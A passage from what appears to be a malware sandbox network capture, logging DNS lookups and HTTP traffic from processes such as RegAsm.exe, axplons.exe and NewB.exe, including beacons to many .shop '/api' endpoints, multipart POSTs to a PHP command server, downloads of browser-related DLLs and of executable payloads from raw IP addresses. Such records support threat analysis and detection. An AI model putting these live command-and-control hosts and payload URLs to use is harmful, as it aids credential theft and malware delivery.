User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: holicisticscrarws.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=dac62o0u2vkin7n13k16v523k5; expires=Fri, 06-Sep-2024 03:37:29 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ec4mCt%2BLOVcg3f2U24sP2TRyO3rgqMMJ9nJDPXopnTgZvTDcUGQPMFNPC6RSkCZZzAYILpzQ%2BLz5poQ8534MTPB52l8qslEltE%2BRjhGV6OmCq2Lu28N88Ct0KZmvAbb2lWODShj00My0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf1d89099539-LHR
alt-svc: h3=":443"; ma=86400
DNS

boredimperissvieos.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

boredimperissvieos.shop

IN A

Response

boredimperissvieos.shop

IN A

172.67.186.30

boredimperissvieos.shop

IN A

104.21.72.135
POST

https://boredimperissvieos.shop/api

RegAsm.exe

Remote address:

172.67.186.30:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: boredimperissvieos.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=d7rk947c4pmfmoer0m4o6vkcne; expires=Fri, 06-Sep-2024 03:37:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAR%2B3oh1ClU7VADcrcORW1E%2FK%2Bzi3JrZLdWy0m5pIHFzi%2BPRBL3C2iZnAOneJbw%2BZ9taySM0dllEIFHOyKHSPybpiOYJuwZDP0TMOqU94CUYs%2F3%2FeAoOUlpMGvoPH3XxUk%2Bix3onUmdwew%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf20ee467327-LHR
alt-svc: h3=":443"; ma=86400
DNS

92.40.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.40.21.104.in-addr.arpa

IN PTR

Response
DNS

30.186.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.186.67.172.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
Host: 49.13.229.86
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 156
Connection: keep-alive
Vary: Accept-Encoding
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
Host: 49.13.229.86
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1520
Connection: keep-alive
Vary: Accept-Encoding
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI
Host: 49.13.229.86
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5416
Connection: keep-alive
Vary: Accept-Encoding
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBA
Host: 49.13.229.86
Content-Length: 5079
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
GET

http://49.13.229.86/84bad7132df89fd7/sqlite3.dll

RegAsm.exe

Remote address:

49.13.229.86:80

Request

GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:54 GMT
Content-Type: application/x-msdos-program
Content-Length: 1106998
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB
Host: 49.13.229.86
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGD
Host: 49.13.229.86
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
GET

http://49.13.229.86/84bad7132df89fd7/freebl3.dll

RegAsm.exe

Remote address:

49.13.229.86:80

Request

GET /84bad7132df89fd7/freebl3.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:56 GMT
Content-Type: application/x-msdos-program
Content-Length: 685392
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
GET

http://49.13.229.86/84bad7132df89fd7/mozglue.dll

RegAsm.exe

Remote address:

49.13.229.86:80

Request

GET /84bad7132df89fd7/mozglue.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:59 GMT
Content-Type: application/x-msdos-program
Content-Length: 608080
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
GET

http://49.13.229.86/84bad7132df89fd7/msvcp140.dll

RegAsm.exe

Remote address:

49.13.229.86:80

Request

GET /84bad7132df89fd7/msvcp140.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: application/x-msdos-program
Content-Length: 450024
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
GET

http://49.13.229.86/84bad7132df89fd7/nss3.dll

RegAsm.exe

Remote address:

49.13.229.86:80

Request

GET /84bad7132df89fd7/nss3.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: application/x-msdos-program
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
GET

http://49.13.229.86/84bad7132df89fd7/softokn3.dll

RegAsm.exe

Remote address:

49.13.229.86:80

Request

GET /84bad7132df89fd7/softokn3.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:02 GMT
Content-Type: application/x-msdos-program
Content-Length: 257872
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
GET

http://49.13.229.86/84bad7132df89fd7/vcruntime140.dll

RegAsm.exe

Remote address:

49.13.229.86:80

Request

GET /84bad7132df89fd7/vcruntime140.dll HTTP/1.1
Host: 49.13.229.86
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:02 GMT
Content-Type: application/x-msdos-program
Content-Length: 80880
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC
Host: 49.13.229.86
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
Host: 49.13.229.86
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2408
Connection: keep-alive
Vary: Accept-Encoding
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJD
Host: 49.13.229.86
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK
Host: 49.13.229.86
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
POST

http://49.13.229.86/c73eed764cc59dcb.php

RegAsm.exe

Remote address:

49.13.229.86:80

Request

POST /c73eed764cc59dcb.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI
Host: 49.13.229.86
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
DNS

86.229.13.49.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.229.13.49.in-addr.arpa

IN PTR

Response

86.229.13.49.in-addr.arpa

IN PTR

static862291349clientsyour-serverde
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
GET

http://5.42.96.78/files/file300un.exe

axplons.exe

Remote address:

5.42.96.78:80

Request

GET /files/file300un.exe HTTP/1.1
Host: 5.42.96.78

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 12 May 2024 18:54:03 GMT
ETag: "2ab8e0-618464adfc7c0"
Accept-Ranges: bytes
Content-Length: 2799840
Content-Type: application/x-msdownload
DNS

smallelementyjdui.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

smallelementyjdui.shop

IN A

Response

smallelementyjdui.shop

IN A

104.21.15.116

smallelementyjdui.shop

IN A

172.67.162.147
POST

https://smallelementyjdui.shop/api

RegAsm.exe

Remote address:

104.21.15.116:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: smallelementyjdui.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=p9f3t512s0k21m5ust7hsnuu5b; expires=Fri, 06-Sep-2024 03:37:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uufSA8Kzk6x5Dj3XFT9M0xdMljsfW2jpl61eCMTOqSTuPWUomKymonuLLAr4NXTIJQyUwo2bF0a62NliSsXV5BNO9XcfA6%2BT2XDSK94XCnbMapRkXQ%2Fx4Nu3YhXVLRpFDtm%2FqOX13aHf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf418999dd68-LHR
alt-svc: h3=":443"; ma=86400
POST

https://smallelementyjdui.shop/api

RegAsm.exe

Remote address:

104.21.15.116:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: smallelementyjdui.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fjb3gegk6ferklc79cd4t5lcmt; expires=Fri, 06-Sep-2024 03:37:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oPPfryLTrIKGuMe41jHRMeCnBJV16LdnQKaRKFzoKga9jYi5yBx7HTMJcjpL60z1uRElwg9s%2BrPT0OA7XNG%2FjQVvJ1FAJrTzMsPRMFnLQKIizh02lfmbSYOQnQCLe6sT3d7uF4hlxJOf"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf609da4dd68-LHR
alt-svc: h3=":443"; ma=86400
DNS

78.96.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

78.96.42.5.in-addr.arpa

IN PTR

Response
DNS

sofaprivateawarderysj.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

sofaprivateawarderysj.shop

IN A

Response

sofaprivateawarderysj.shop

IN A

188.114.96.2

sofaprivateawarderysj.shop

IN A

188.114.97.2
POST

https://sofaprivateawarderysj.shop/api

RegAsm.exe

Remote address:

188.114.96.2:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sofaprivateawarderysj.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=8kvohbd0h07r2fonud2oniq2kp; expires=Fri, 06-Sep-2024 03:37:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2Fyy4vsdswu3Mi24z%2BEXsPocCArKRFPWU9cjFkdwWWSXLQ5WBCPfb1MJA8OKufZn3Ito8G%2FBlY0rOV6QMJm9rwNlXFj70oyMVyeKRfCzDDIDuNB%2B7TLTodv9KUscFqjAqmlf1z9f6fsGzm%2Bw2w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf447bae23ad-LHR
alt-svc: h3=":443"; ma=86400
DNS

lineagelasserytailsd.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

lineagelasserytailsd.shop

IN A

Response

lineagelasserytailsd.shop

IN A

172.67.141.60

lineagelasserytailsd.shop

IN A

104.21.62.251
POST

https://lineagelasserytailsd.shop/api

RegAsm.exe

Remote address:

172.67.141.60:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lineagelasserytailsd.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=c89uanth5he5rjnhltugmrlv45; expires=Fri, 06-Sep-2024 03:37:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6zMNG5NvdiMzZZy1XMKXGBFq%2F6EwNnBI8U6bgmRN2z8ZMvaTX8oa0p5wAhQAx7er8Uhzvf5fwWCnGTAGgapyykQKqI0mSzATNQ%2Fda7wOwzv8S5z8VOzYB6O9ENk1W%2FURTD4dzL28YOBBGDNU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf4f293bdd73-LHR
alt-svc: h3=":443"; ma=86400
DNS

116.15.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.15.21.104.in-addr.arpa

IN PTR

Response
DNS

tendencyportionjsuk.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

tendencyportionjsuk.shop

IN A

Response

tendencyportionjsuk.shop

IN A

104.21.85.127

tendencyportionjsuk.shop

IN A

172.67.205.185
POST

https://tendencyportionjsuk.shop/api

RegAsm.exe

Remote address:

104.21.85.127:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: tendencyportionjsuk.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=vncrvhnpj13vjnf2b6o0hg3nk4; expires=Fri, 06-Sep-2024 03:37:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cL0vNyhpcwgLJwSB0pky452B91jUHw8QWjU3SIgWkD88207zvbjcE69lic6ZFEEWyzrPp2L2o1ZtJWXIkD%2BTWS%2FsM3a%2B6B0oyBbaaxiEkZGfn2CBlOxRQWUJCsTAjklC9GTmVtiXM48HexM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf51fb5393f6-LHR
alt-svc: h3=":443"; ma=86400
DNS

60.141.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

60.141.67.172.in-addr.arpa

IN PTR

Response
DNS

headraisepresidensu.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

headraisepresidensu.shop

IN A

Response

headraisepresidensu.shop

IN A

172.67.206.145

headraisepresidensu.shop

IN A

104.21.50.137
POST

https://headraisepresidensu.shop/api

RegAsm.exe

Remote address:

172.67.206.145:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: headraisepresidensu.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:50:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=gb3ojm1ofgho1fsrdhr5lmkaha; expires=Fri, 06-Sep-2024 03:37:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0SO5QgChYrWCFmka0W0KEWk8jZQCd1nrZbzNvzJ%2Fq7gxV7b1TgBYIu1rlLkBBEkv3JVHucorMLcr3SBDuVdxR0Jle9oXDUvjMSQLGa00Ok2Nq99XES3CoKTQaIvRhAlT5VX8sSwzMk9b5gA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf555f0579ac-LHR
alt-svc: h3=":443"; ma=86400
GET

http://185.172.128.19/NewB.exe

axplons.exe

Remote address:

185.172.128.19:80

Request

GET /NewB.exe HTTP/1.1
Host: 185.172.128.19

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:50:59 GMT
Content-Type: application/octet-stream
Content-Length: 428544
Last-Modified: Thu, 09 Nov 2023 18:10:51 GMT
Connection: keep-alive
ETag: "654d20ab-68a00"
Accept-Ranges: bytes
DNS

appetitesallooonsj.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

appetitesallooonsj.shop

IN A

Response

appetitesallooonsj.shop

IN A

172.67.151.60

appetitesallooonsj.shop

IN A

104.21.48.123
POST

https://appetitesallooonsj.shop/api

RegAsm.exe

Remote address:

172.67.151.60:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: appetitesallooonsj.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=o927ro81qvjistr07eimmg54j7; expires=Fri, 06-Sep-2024 03:37:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aWzI%2F6kCia6Fh6Sji9B4BgnbBWZ5c%2BV0qxf0RlHWeHe7lisKFTWPIZ6tHBfvfPAwJMKB%2FQD%2F8W1E%2FkyeLbsI4wSS9PB3BtjgqHnt09WBMVMdTgGZiC8sligYS0bAi0tgEaGcAc36BdvXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf583f6c9455-LHR
alt-svc: h3=":443"; ma=86400
DNS

127.85.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.85.21.104.in-addr.arpa

IN PTR

Response
DNS

145.206.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.206.67.172.in-addr.arpa

IN PTR

Response
DNS

19.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.128.172.185.in-addr.arpa

IN PTR

Response
DNS

minorittyeffeoos.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

minorittyeffeoos.shop

IN A

Response

minorittyeffeoos.shop

IN A

172.67.130.179

minorittyeffeoos.shop

IN A

104.21.3.125
POST

https://minorittyeffeoos.shop/api

RegAsm.exe

Remote address:

172.67.130.179:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: minorittyeffeoos.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=363bdvpir14qf9q80nagq9f7aa; expires=Fri, 06-Sep-2024 03:37:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTZT0VjNI9C%2FiyypH0c6GAAbhAhNpqcRUkW14S48vBzEeVZPjHpqfpcAwYpiuPo3v3uNOi7qYNt3d12HjOajr%2Fs2or1jE8RSMAzF14sAW73742LaG5HbHAYZ%2B%2BDFe3Ttt4VK0RyZixM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf5b6b988883-LHR
alt-svc: h3=":443"; ma=86400
DNS

prideconstituiiosjk.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

prideconstituiiosjk.shop

IN A

Response

prideconstituiiosjk.shop

IN A

188.114.96.2

prideconstituiiosjk.shop

IN A

188.114.97.2
POST

http://185.172.128.19/ghsdh39s/index.php

NewB.exe

Remote address:

185.172.128.19:80

Request

POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.172.128.19/ghsdh39s/index.php

NewB.exe

Remote address:

185.172.128.19:80

Request

POST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 13 May 2024 09:51:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://prideconstituiiosjk.shop/api

